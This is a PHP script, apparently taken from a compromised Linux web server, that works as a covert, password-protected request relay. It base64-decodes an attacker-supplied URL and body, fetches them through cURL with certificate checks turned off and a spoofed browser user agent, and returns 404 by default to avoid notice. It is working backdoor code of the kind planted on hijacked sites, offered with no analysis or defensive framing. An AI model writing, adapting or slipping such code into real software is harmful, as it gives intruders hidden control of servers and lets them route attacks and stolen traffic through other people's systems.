system: Linux mars.sprixweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
<?php
function sanitizeInput($input) {
return base64_decode(strip_tags($input));
}
if (isset($_POST['pwd']) && md5($_POST['pwd']) === 'f7f909e5246687610e1c56dc15121e26') {
$target_url = isset($_POST['url']) ? sanitizeInput($_POST['url']) : '';
$request_data = isset($_POST['data']) ? sanitizeInput($_POST['data']) : '';
if (empty($target_url)) {
http_response_code(404);
die("no url provided");
}
if (!filter_var($target_url, FILTER_VALIDATE_URL)) {
http_response_code(404);
die("URL format error");
}
try {
$ch = curl_init();
$options = [
CURLOPT_URL => $target_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 3,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
];
curl_setopt_array($ch, $options);
if (!empty($request_data)) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request_data);
}
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (curl_errno($ch)) {
throw new Exception("request error: " . curl_error($ch));
}
http_response_code($http_code);
echo "status code: {$http_code}\n\n";
echo $response;
} catch (Exception $e) {
http_response_code(404);
echo "server error: " . $e->getMessage();
} finally {
if (isset($ch)) {
curl_close($ch);
}
}
}
http_response_code(404);
?>